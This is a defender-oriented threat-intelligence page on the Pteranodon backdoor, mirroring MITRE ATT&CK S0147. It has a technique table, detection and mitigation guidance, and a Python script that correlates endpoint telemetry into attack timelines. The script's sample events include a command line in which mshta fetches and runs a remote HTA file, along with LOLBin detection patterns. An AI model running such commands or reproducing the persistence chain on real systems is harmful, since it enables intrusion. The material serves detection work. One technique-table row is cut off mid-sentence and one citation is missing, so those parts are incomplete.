S0147: Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [1]
Analyst context for executives and security teams
Pteranodon is a Windows backdoor associated in ATT&CK with Gamaredon Group. Its value for defenders lies less in a single malware name than in the behavior cluster ATT&CK links to it: persistence through scheduled tasks, the Startup folder, and Run keys; execution through the command shell, Visual Basic, mshta, and rundll32; web-based command-and-control; local staging; screen capture; tool transfer; exfiltration over the C2 channel; and several evasion and anti-analysis behaviors. For security leaders, this makes Pteranodon a useful test case for whether Windows endpoint and network monitoring can reconstruct a post-compromise backdoor workflow end to end rather than only alert on a known file hash.
Executive priority
Prioritize this as a coverage validation item for Windows environments, especially where cyber-espionage risk, sensitive document exposure, or Ukraine-related threat intelligence context is relevant. Because ATT&CK provides no official detection guidance for Pteranodon itself, leaders should ask whether existing EDR, SIEM, network monitoring, and incident response playbooks can prove visibility across persistence, scripted execution, living-off-the-land proxy execution, collection, staging, and outbound C2/exfiltration behaviors. This supports business continuity, audit evidence, and IR readiness by showing whether the organization can detect and investigate a backdoor lifecycle even when malware-specific signatures are incomplete.
Technical view
SOC and detection teams should validate behavior-based coverage on Windows for the related techniques: Scheduled Task, Registry Run Keys/Startup Folder, Windows Command Shell, Visual Basic, mshta, rundll32, Native API use, dynamic API resolution, deobfuscation/decoding, virtualization/sandbox evasion, file and directory discovery, screen capture, local data staging, ingress tool transfer, web-protocol C2, exfiltration over C2, and file deletion. The practical exercise is to confirm that endpoint process, registry, task scheduler, file, and network telemetry can be correlated into a timeline showing persistence creation, execution chain, discovery/collection, staging, outbound communications, and cleanup. Treat the Gamaredon Group relationship as threat-intelligence context, not as automatic attribution for any local alert.
Likely telemetry
- Windows process creation telemetry, including parent-child relationships for cmd.exe, mshta.exe, rundll32.exe, script hosts, and scheduled task execution
- Windows Task Scheduler creation, modification, and execution events
- Registry modification telemetry for Run keys and startup persistence locations
- File creation, modification, staging, transfer, and deletion events on endpoints
- Command-line arguments and script content where legally and operationally appropriate
Detection direction
- Build detections around correlated behavior rather than the Pteranodon name alone, because the official ATT&CK object does not provide detection logic.
- Tune for suspicious use of mshta.exe and rundll32.exe in unusual parent-child chains, uncommon paths, script-driven execution, or network-adjacent behavior, while accounting for legitimate administrative and software activity.
- Monitor scheduled task and Run key creation or modification, especially when linked to newly written files, script interpreters, user-writable paths, or external network activity.
- Correlate file and directory discovery, local staging, screen capture indicators, and outbound web traffic to identify possible collection-to-exfiltration sequences.
- Validate visibility into file deletion after execution or staging, since cleanup can remove artifacts needed for IR scoping.
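The correlation exercise described in the technical view and in the detection direction above can be prototyped offline before it is committed to a SIEM rule. The script below is an added example, not part of the ATT&CK object or of any vendor tooling: it tags Sysmon-style events (process creation, registry set, file create/delete, scheduled-task creation, network connect) with the lifecycle stage they correspond to, builds a per-host timeline, and flags hosts where several stages line up. The hosts, paths, task action, SID and IP addresses in the sample events are constructed for illustration and are not Pteranodon indicators; the thresholds and path lists are assumptions to be tuned against local telemetry.

```python
"""Correlate Windows endpoint telemetry into a backdoor-lifecycle timeline.

Added example with constructed sample events (Sysmon-style field names:
Image, ParentImage, CommandLine, TargetObject, TargetFilename,
DestinationPort). Nothing below is a real Pteranodon indicator.
"""
from collections import defaultdict
from ntpath import basename

LOLBINS = {"mshta.exe", "rundll32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
WEB_PORTS = {80, 443, 8080}


def _lower(s):
    return (s or "").lower()


def user_writable(path):
    """True if the path sits in a location a non-admin user can write to."""
    return any(p in _lower(path) for p in USER_WRITABLE)


def tag(ev):
    """Map one raw event to a lifecycle-stage label, or None if it looks routine."""
    kind = ev["kind"]
    image = _lower(basename(ev.get("Image", "")))
    if kind == "process_create":
        parent = _lower(basename(ev.get("ParentImage", "")))
        cmd = _lower(ev.get("CommandLine", ""))
        # mshta/rundll32 launched by a script host, with a URL, or from a user path
        if image in LOLBINS and (parent in SCRIPT_HOSTS or "http" in cmd or user_writable(cmd)):
            return "execution:lolbin"      # T1218.005 / T1218.011
        if image in {"wscript.exe", "cscript.exe"} and user_writable(cmd):
            return "execution:script"      # T1059.005 from a user-writable path
    elif kind == "registry_set":
        if any(k in _lower(ev["TargetObject"]) for k in RUN_KEYS) and user_writable(ev["Details"]):
            return "persistence:runkey"    # T1547.001
    elif kind == "file_create":
        if STARTUP_DIR in _lower(ev["TargetFilename"]):
            return "persistence:startup"   # T1547.001
    elif kind == "task_create":
        action = _lower(ev["TaskContent"])
        if user_writable(action) or any(s in action for s in SCRIPT_HOSTS | LOLBINS):
            return "persistence:task"      # T1053.005
    elif kind == "network_connect":
        if image in LOLBINS | SCRIPT_HOSTS and ev["DestinationPort"] in WEB_PORTS:
            return "c2:web"                # T1071.001 from a process that rarely needs the web
    elif kind == "file_delete":
        if user_writable(ev["TargetFilename"]) and image in SCRIPT_HOSTS:
            return "cleanup:delete"        # T1070.004
    return None


def build_timelines(events):
    """Per-host, time-ordered list of (ts, label, event kind) for tagged events only."""
    timelines = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = tag(ev)
        if label:
            timelines[ev["host"]].append((ev["ts"], label, ev["kind"]))
    return dict(timelines)


def stages_hit(timeline):
    """Distinct lifecycle stages (execution, persistence, c2, cleanup) seen on one host."""
    return sorted({label.split(":")[0] for _, label, _ in timeline})


def hosts_needing_triage(events, min_stages=3):
    """Hosts where at least min_stages different stages co-occur (assumed threshold)."""
    return sorted(h for h, t in build_timelines(events).items() if len(stages_hit(t)) >= min_stages)


# Constructed sample telemetry. WS01 shows a chain resembling the behaviors in the
# technique table; WS02 shows routine activity that must not be tagged.
SID = "S-1-5-21-1111-2222-3333-1001"  # constructed
EVENTS = [
    {"host": "WS01", "ts": 1, "kind": "process_create", "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.vbs"},
    {"host": "WS01", "ts": 2, "kind": "process_create", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "mshta.exe http://198.51.100.7/index.hta"},
    {"host": "WS01", "ts": 3, "kind": "task_create", "Image": "C:\\Windows\\System32\\schtasks.exe",
     "TaskContent": "wscript.exe C:\\Users\\alice\\AppData\\Roaming\\svc\\update.vbs"},
    {"host": "WS01", "ts": 4, "kind": "registry_set", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetObject": f"HKU\\{SID}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc",
     "Details": "C:\\Users\\alice\\AppData\\Roaming\\svc\\svc.exe"},
    {"host": "WS01", "ts": 5, "kind": "network_connect", "Image": "C:\\Windows\\System32\\mshta.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 80},
    {"host": "WS01", "ts": 6, "kind": "file_delete", "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.vbs"},
    {"host": "WS02", "ts": 1, "kind": "process_create", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"host": "WS02", "ts": 2, "kind": "network_connect",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

if __name__ == "__main__":
    for host, timeline in build_timelines(EVENTS).items():
        print(host, stages_hit(timeline))
        for ts, label, kind in timeline:
            print(f"  t={ts} {label:22s} {kind}")
    print("triage:", hosts_needing_triage(EVENTS))
```

The per-event tags are deliberately loose (a script host in a user-writable path, a LOLBin with a URL on its command line) and would be noisy on their own; the signal is the co-occurrence of execution, persistence, C2 and cleanup stages on one host within a short window, which is what the triage function keys on. Swapping the constructed list for events pulled from Sysmon or an EDR export, and tuning the path and port lists to the environment, is the intended next step.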
Mitigation priorities
- Harden Windows persistence surfaces by controlling and reviewing scheduled tasks, startup folders, and Run key changes.
- Restrict and monitor living-off-the-land execution paths such as mshta.exe, rundll32.exe, command shell, and Visual Basic/script execution according to business need.
- Apply least privilege so user-context persistence and execution have limited access to sensitive data and administrative functions.
- Improve egress governance by monitoring and controlling outbound web traffic, especially from endpoints and processes that do not normally initiate external connections.
- Ensure endpoint protection and logging preserve enough process, registry, file, and network context for incident response timelines.
Analyst notes and limits
ATT&CK identifies Pteranodon as a custom backdoor used by Gamaredon Group and links it to a broad set of Windows-relevant behaviors. The strongest defensive value is using those relationships to validate layered visibility: endpoint execution, persistence, collection, staging, C2, exfiltration, and anti-analysis behaviors. The related group description provides geopolitical and sector context involving Ukrainian military, law enforcement, judiciary, non-profit, and NGO targeting, but that does not by itself establish exposure or attribution in any specific environment.
The official Pteranodon object carries no ATT&CK tactics, labels, or detection guidance, its description is brief, and the only alias it records is Pterodo. This take is therefore based on the supplied STIX fields, external references, and relationship context only. Local environment data is required to determine actual exposure, prevalence, control coverage, false positives, or incident impact.
Pteranodon
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1113 | Screen Capture | Pteranodon can capture screenshots at a configurable interval. (Citation: Palo Alto Gamaredon Feb 2017) (Citation: Unit 42 Gamaredon February 2022) |
| Enterprise | T1059.003 | Windows Command Shell (sub-technique) | Pteranodon can use `cmd.exe` for execution on victim systems. (Citation: Palo Alto Gamaredon Feb 2017) (Citation: Symantec Shuckworm January 2022) |
| Enterprise | T1106 | Native API | Pteranodon has used various API calls. (Citation: Microsoft Actinium February 2022) |
| Enterprise | T1105 | Ingress Tool Transfer | Pteranodon can download and execute additional files. (Citation: Palo Alto Gamaredon Feb 2017) (Citation: Symantec Shuckworm January 2022) (Citation: Unit 42 Gamaredon February 2022) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder (sub-technique) | Pteranodon copies itself to the Startup folder to establish persistence. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | Pteranodon can use HTTP for C2. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1083 | File and Directory Discovery | Pteranodon identifies files matching certain file extensions and copies them to subdirectories it created. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Pteranodon can decrypt encrypted data strings prior to using them. (Citation: Microsoft Actinium February 2022) |
| Enterprise | T1027.007 | Dynamic API Resolution (sub-technique) | Pteranodon can use a dynamic Windows hashing algorithm to map API components. (Citation: Microsoft Actinium February 2022) |
| Enterprise | T1059.005 | Visual Basic (sub-technique) | Pteranodon can use a malicious VBS file for execution. (Citation: Symantec Shuckworm January 2022) |
| Enterprise | T1218.011 | Rundll32 (sub-technique) | Pteranodon executes functions using rundll32.exe. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Pteranodon exfiltrates screenshot files to its C2 server. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1070.004 | File Deletion (sub-technique) | Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes. (Citation: Palo Alto Gamaredon Feb 2017) |
| Enterprise | T1074.001 | Local Data Staging (sub-technique) | Pteranodon creates various subdirectories under |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Pteranodon has the ability to use anti-detection functions to identify sandbox environments. (Citation: Unit 42 Gamaredon February 2022) |
| Enterprise | T1218.005 | Mshta (sub-technique) | Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server. (Citation: Symantec Shuckworm January 2022) |
| Enterprise | T1053.005 | Scheduled Task (sub-technique) | Pteranodon schedules tasks to invoke its components in order to establish persistence. (Citation: Palo Alto Gamaredon Feb 2017) (Citation: Symantec Shuckworm January 2022) |
Groups, software, and campaigns
G0047: Gamaredon Group
Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word "Armageddon," found in early campaigns.[1][2][3][4][5]
In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. [6][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table compares the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.1 | | Current bundle | 80be6ca8a27f… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Palo Alto Gamaredon Feb 2017. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
[2] Pterodo (alias record). (Citation: Symantec Shuckworm January 2022) (Citation: Secureworks IRON TILDEN Profile)
[3] Secureworks IRON TILDEN Profile. Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.
[4] Symantec Shuckworm January 2022. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
[5] mitre-attack S0147.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.